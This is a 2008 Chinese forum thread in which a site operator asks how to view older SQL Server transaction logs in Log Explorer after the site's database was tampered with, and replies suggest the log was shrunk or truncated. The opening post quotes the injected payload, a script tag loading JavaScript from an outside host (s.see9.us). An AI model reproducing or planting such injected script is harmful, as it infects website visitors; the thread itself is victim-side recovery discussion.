使用Log Explorer 如何查看 sql server 不活动的日志!!!!!!!!

hmilyice 2008-05-12 12:36:39
网站数据库被篡改了数据,加入了"> </title> <script src=http://s"> </title> <script src=http://s.see9.us/s.js> </script> <!-- ,想使用Log Explorer查看日志却发现只能看到2008-5-11日1点27分之后的日志,日志文件大小有91M,想来不应该只有5月11日之后的阿,请高手指点如何看到5月11日之前的日志。
另外我公司的另一个网站5月4日也中过招,当时我就是用Log Explorer恢复的数据,不知道这次为什么无法查看之前的日志了?
...全文
159 11 打赏 收藏 转发到动态 举报
写回复
用AI写文章
11 条回复
切换为时间正序
请发表友善的回复…
发表回复
chengzinanren 2008-05-18
  • 打赏
  • 举报
回复
日志损坏!备份的时候选择了删除不活动的日志
chengzinanren 2008-05-18
  • 打赏
  • 举报
回复
日志损坏!备份的时候选择了删除不活动的日志
chengzinanren 2008-05-18
  • 打赏
  • 举报
回复
我现在也遇到了,是由于在备份的时候选择了删除不活动的日志,造成日志损害
hmilyice 2008-05-13
  • 打赏
  • 举报
回复
暂时先用4月10日的备份还原数据库了,不过期待问题得到解答。谢谢!
tianhuo_soft 2008-05-12
  • 打赏
  • 举报
回复
看样子是高手~!

收缩你的日志了~!

他使用了
alter database DatabaseName set auto_shrink on
这样命令 结果你以前的日志全没了

除非你有备份
-狙击手- 2008-05-12
  • 打赏
  • 举报
回复
5-11日1点左右有没有对日志进行过什么 处理
hmilyice 2008-05-12
  • 打赏
  • 举报
回复
to 7楼:没有啊
晓风残月0110 2008-05-12
  • 打赏
  • 举报
回复
进行过日志阶段操作吧
zccmy22 2008-05-12
  • 打赏
  • 举报
回复
帮你顶一下,我帮不上忙 .
hmilyice 2008-05-12
  • 打赏
  • 举报
回复
to 2楼:没有进行操作,今天(周一)早上上班才发现的,11号周六晚上我们都不上班
to 3楼:我的日志文件还是91M阿,收缩了不应该还这么大吧

等待高手出现解答

zzyyc 2008-05-12
  • 打赏
  • 举报
回复
学习。

22,209

社区成员

发帖
与我相关
我的任务
社区描述
MS-SQL Server 疑难问题
社区管理员
  • 疑难问题社区
  • 尘觉
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧